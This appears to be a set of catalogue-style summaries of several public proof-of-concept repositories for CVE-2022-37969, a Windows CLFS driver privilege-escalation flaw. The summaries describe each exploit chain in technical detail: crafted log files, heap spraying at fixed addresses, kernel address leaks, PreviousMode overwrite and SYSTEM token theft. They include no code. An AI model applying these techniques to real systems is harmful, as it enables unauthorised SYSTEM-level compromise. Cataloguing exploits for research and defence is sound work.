Windows Common Log File System Driver Elevation of Privilege Vulnerability

This repository is a Windows local privilege escalation exploit for CVE-2022-37969 in the Common Log File System (CLFS). It contains both a crash-oriented proof of trigger (crash.cpp) and a fuller privilege-escalation exploit (poc.cpp plus supporting modules). The code is not part of a public exploit framework. Repository structure: poc.cpp is the main exploit entry point. It orchestrates token and kernel address discovery, CLFS pool offset discovery, malicious Log.blf crafting, heap spraying, named-pipe-based arbitrary read/write preparation, vulnerability triggering, token replacement, and finally launching cmd.exe. crash.cpp is a standalone simpler trigger that crafts a CLFS log and closes handles to induce the bug, likely for crash validation. Supporting files are modularized: leak.cpp retrieves current and SYSTEM EPROCESS addresses and kernel module bases; createLogFile.cpp creates CLFS logs and containers; getOffset.cpp repeatedly creates CLFS logs and queries SystemBigPoolInformation to infer stable CLFS pool spacing; craftFile.cpp corrupts specific offsets inside Log.blf and recomputes CRC32; attack.cpp performs heap spraying, named pipe attribute manipulation, kernel pointer calculations, bug triggering, SYSTEM token leakage, and token overwrite; clear.cpp removes artifacts. Main exploit capability: the exploit achieves SYSTEM privilege by abusing the CLFS vulnerability to redirect execution/structure access toward attacker-controlled memory, then using a named pipe attribute object as a primitive to read kernel memory containing the SYSTEM EPROCESS token and later overwrite the current process token. The exploit explicitly references ClfsEarlierLsn and SeSetAccessStateGenericMapping, computes their kernel addresses by loading clfs.sys and ntoskrnl.exe in user mode and rebasing against live kernel module bases, and uses crafted fake structures in user-mapped memory. It also sprays memory at fixed addresses (0x5000000 and 0x10000), allocates a fake user mapping near 0xffffffff, and assumes the token field is at EPROCESS+0x4b8. Fingerprintable artifacts are primarily local file paths and module names rather than network indicators. The exploit creates and modifies CLFS files under C:\Users\Public\, including Log.blf, Lxg*.blf, and container_* files, and loads/targets CLFS.SYS, ntoskrnl.exe, and ntdll.dll. No external network communication, URLs, domains, or IPs are present. Overall purpose: this is a real local Windows kernel exploit repository for CVE-2022-37969, intended to demonstrate and weaponize CLFS corruption into privilege escalation. It is more than a simple PoC because it includes a working post-exploitation outcome (SYSTEM shell), but the payload is basic and hardcoded rather than framework-driven or highly configurable.

Repository purpose: proof-of-concept local privilege escalation exploit for CVE-2022-37969 in Windows CLFS (CLFS.SYS). It contains two separate PoCs: one for Windows 10 (win10_poc/) and one for Windows 11 (win11_poc/), both using CLFS log/container operations plus pool grooming to obtain a kernel write primitive and then elevate privileges. Structure and key components: - README.md: states CVE-2022-37969 PoC and tested builds (Win10 19044.1766, Win11 22000.918) and build toolchain (VS2022 v143, SDK 10.0, C++14). Win10 PoC (win10_poc/): - poc_test.cpp: main driver. Steps include: initialize Big Pool querying; create a temp folder for log spraying; resolve kernel addresses of SeSetAccessStateGenericMapping (ntoskrnl) and ClfsEarlierLsn (CLFS.SYS); perform heap spray at fixed addresses; craft and CRC-fix MyMiniLog.blf; repeatedly measure CLFS pool spacing (GetOffsetBetweenPools); create/open CLFS logs (log:MyMiniLog and log:MyMiniLog_2); add CLFS containers; set file mode via NtSetInformationFile to reach a CLFS RemoveContainer path; finally calls ExecuteTokenReplacement(g_PreviousModeAddress) to steal SYSTEM token and spawns cmd. - bigpool.h: uses NtQuerySystemInformation(SystemBigPoolInformation) to enumerate big pool allocations and identify CLFS allocations by tag 'Clfs' and size 0x7a00; tracks unique kernel virtual addresses. - kernel_utils.h: leaks kernel module bases via SystemModuleInformation; computes kernel addresses of two functions by loading user copies of ntoskrnl.exe and CLFS.SYS and adding offsets to kernel bases; also leaks kernel object addresses from handle table (SystemExtendedHandleInformation) and computes ETHREAD->PreviousMode address (offset 0x232 for Win10 1803-22H2). - clfs_operations.h: creates many CLFS logs under %TEMP%\heap_spray_temp; crafts the BLF file by writing specific bytes at hardcoded offsets; recalculates and fixes CRC32 for the crafted block. - heap_spray.h: allocates memory at 0x05000000 and 0x10000 and fills it with pointers to the resolved kernel functions; sets up a write target by populating a large region with a chosen address (PreviousMode-8) to support the arbitrary write primitive. - token_operations.h: post-exploitation logic. Assumes PreviousMode has been set to 0 (kernel-mode) so NtReadVirtualMemory/NtWriteVirtualMemory can read/write kernel memory. It locates current EPROCESS via ETHREAD->Process, walks ActiveProcessLinks to find PID 4 (System), reads System token, overwrites current process token, then restores PreviousMode to 1 and launches `cmd`. Win11 PoC (win11_poc/): - poc_test_win11.cpp: main driver for Win11. Initializes NtQuerySystemInformation, temp folder, resolves kernel function addresses, obtains current/system token addresses (via token_finder.h, not shown in provided content), performs heap spray, then initializes a pipe-based arbitrary read/write context (pipe_arbitrary_rw.h, not shown). It triggers the CLFS vulnerability twice via vul_trigger(): first to write the system token address into a pipe attribute value location to enable a kernel read, then to overwrite the current token with the system token, and finally spawns cmd. - vulnerability_trigger.h: encapsulates the CLFS exploitation sequence: delete BLFs, create base log, craft+CRC-fix BLF, pool spacing detection, open logs, add containers, call SetTarget() to program the write values/address, then add another container and set file mode via NtSetInformationFile to reach the vulnerable path. - GetPoolInfoHead.h / GetKeyKernelAddressHead.h: Win11 equivalents of big pool scanning and kernel function address resolution. - clfs_file_craft.h: Win11 version of BLF crafting and CRC fix. - heap_spray.h (Win11): combines temp folder creation, pool spacing detection, heap spray, and SetTarget(write_value01, write_value02, write_address) to program the write primitive. Overall exploit capabilities: - Local kernel address disclosure: via SystemBigPoolInformation (CLFS pool allocations) and SystemExtendedHandleInformation (kernel object pointers) to compute sensitive kernel addresses. - Pool grooming / heap spray: repeated CreateLogFile calls and deterministic VirtualAlloc mappings to place attacker-controlled data at predictable addresses. - CLFS file crafting: modifies MyMiniLog.blf at fixed offsets and repairs CRC32 to pass integrity checks. - Privilege escalation: - Win10 path: uses arbitrary write to set ETHREAD->PreviousMode to 0, then uses NtRead/WriteVirtualMemory to perform token stealing and replacement. - Win11 path: uses CLFS write primitive to pivot into a pipe attribute-based kernel read, extracts a token value, then overwrites the current token. No network I/O is present; all targets are local OS components (CLFS subsystem, kernel modules, and local files under current directory and %TEMP%).

This repository is a proof-of-concept (PoC) exploit for CVE-2022-37969, a local privilege escalation vulnerability in the Windows CLFS (Common Log File System) driver. The repository contains five files: a LICENSE, a detailed README.md explaining Windows privilege escalation and the exploit steps, and three C++ source files (crc32.cpp, crc32.h, exploit.cpp). The main exploit logic is in 'sources/exploit.cpp', which interacts with Windows kernel and CLFS driver APIs to manipulate kernel memory and overwrite the process token, thereby elevating privileges to SYSTEM. The exploit then spawns a SYSTEM-level command prompt. The code uses dynamic loading of ntdll.dll and clfsw32.dll, and references system files such as 'C:\Windows\System32\ntoskrnl.exe' and 'C:\Windows\System32\drivers\CLFS.SYS' to resolve function addresses for exploitation. The attack vector is local, requiring code execution on a vulnerable Windows system. The exploit is a PoC and is intended for educational and research purposes, as described in the README.

This repository contains a local privilege escalation exploit for CVE-2022-37969, a vulnerability in the Microsoft Windows Common Log File System (CLFS) driver. The main exploit logic is implemented in 'CVE-2022-37969/main.c', with supporting structures and macros in 'pch.h' and 'poc.h'. The exploit works by manipulating kernel memory structures to obtain a SYSTEM token and then spawns a new command prompt (cmd.exe) with SYSTEM privileges. The code is written in C and is designed to be compiled with Visual Studio for x64 Windows targets. The exploit requires local access to the vulnerable system and does not target network services. The repository includes Visual Studio project files and build logs, but the core exploit logic is in the C source files. The exploit is operational and provides a working privilege escalation payload, but is not part of a larger exploitation framework.

This repository is a local Windows kernel exploit proof-of-concept (POC) targeting the CLFS (Common Log File System) component. The code is written primarily in C++ and is structured as a Visual Studio project, with supporting Python scripts for crafting binary log files. The main exploit logic is distributed across several C++ files: - `Prepare_BigPool.cpp` and `Prepare_BigPool.h` handle heap spraying and manipulation of kernel big pool allocations, specifically searching for and tracking CLFS pool tags in kernel memory. - `preparePipe.cpp` sets up named pipes and manipulates their attributes in kernel memory, leveraging knowledge of kernel and driver base addresses to calculate function offsets and potentially perform arbitrary kernel memory writes. - `init.cpp` and `leak.cpp` are responsible for environment setup, including determining the Windows version, locating kernel object addresses, and resolving kernel module base addresses. - The Python script `craft_blf/calculate_checksum.py` is used to calculate CRC32 checksums for binary log files, which are likely used as part of the exploit chain to craft valid CLFS log files. The exploit's main capabilities include: - Locating and manipulating CLFS pool structures in kernel memory. - Performing heap spraying to control memory layout. - Creating and manipulating log files and containers in the user's Desktop directory to trigger vulnerable code paths in the CLFS driver. - Calculating and using kernel and driver base addresses to perform precise memory operations. The exploit is not weaponized and does not include a post-exploitation payload, but demonstrates the ability to manipulate kernel memory and is likely intended for privilege escalation or further kernel exploitation. The attack vector is local, requiring code execution on the target system. The repository contains several fingerprintable file and registry endpoints, including hardcoded paths to log files and containers on the Desktop, and registry access to determine the Windows build number. The code is suitable for researchers or advanced attackers seeking to understand or exploit CLFS vulnerabilities on supported Windows versions.

This repository contains a functional proof-of-concept (PoC) exploit for CVE-2022-37969, a local privilege escalation vulnerability in the Windows Common Log File System (CLFS) driver (CLFS.sys). The main exploit code is in 'CVE-2022-37969-PoC.cpp', which is a C++ program that targets multiple versions of Windows (10, 11, Server 2016/2019/2022) by leveraging a kernel memory corruption bug to overwrite the current process's token with the SYSTEM token. The exploit works by creating and manipulating BLF log files, performing heap spraying, and exploiting the CLFS.sys vulnerability to gain arbitrary kernel write. It then locates and copies the SYSTEM token to the current process, resulting in SYSTEM-level privileges. The exploit finally launches a process (e.g., notepad.exe) as SYSTEM to demonstrate successful privilege escalation. The repository also includes a detailed README.md with exploitation steps, technical background, and references. No network endpoints are involved; the attack vector is purely local. The code interacts with the Windows registry to determine the OS version and uses file paths such as '\SystemRoot\System32\drivers\CLFS.SYS' and '%public%\MyLog.blf' as part of the exploitation process.